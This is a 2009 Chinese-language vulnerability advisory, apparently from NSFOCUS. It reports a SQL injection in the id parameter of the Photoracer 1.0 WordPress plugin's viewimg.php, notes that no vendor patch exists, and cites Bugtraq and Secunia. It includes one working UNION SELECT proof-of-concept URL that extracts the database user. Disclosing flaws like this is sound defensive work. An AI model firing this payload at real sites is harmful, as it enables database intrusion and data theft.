安全研究

安全漏洞
WordPress Photoracer插件id参数SQL注入漏洞

发布日期:2009-06-15
更新日期:2009-06-17

受影响系统:
Paolo Palmonari Photoracer 1.0
描述:
BUGTRAQ  ID: 35382

Photoracer是一个Wordpress论坛插件,允许从管理面板创建照片竞赛。

Photoracer插件的wp-content/plugins/photoracer/viewimg.php页面没有正确地过滤用户所提交的id参数输入,远程攻击者可以通过提交恶意查询请求执行SQL注入攻击。

<*来源:Kacper (kacper1964@yahoo.pl
  
  链接:http://secunia.com/advisories/35450/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://site.pl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,user(),6,7,8--

建议:
厂商补丁:

Paolo Palmonari
---------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://palmonaz.altervista.org/z/photoracer/?esohkb

浏览次数:3150
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障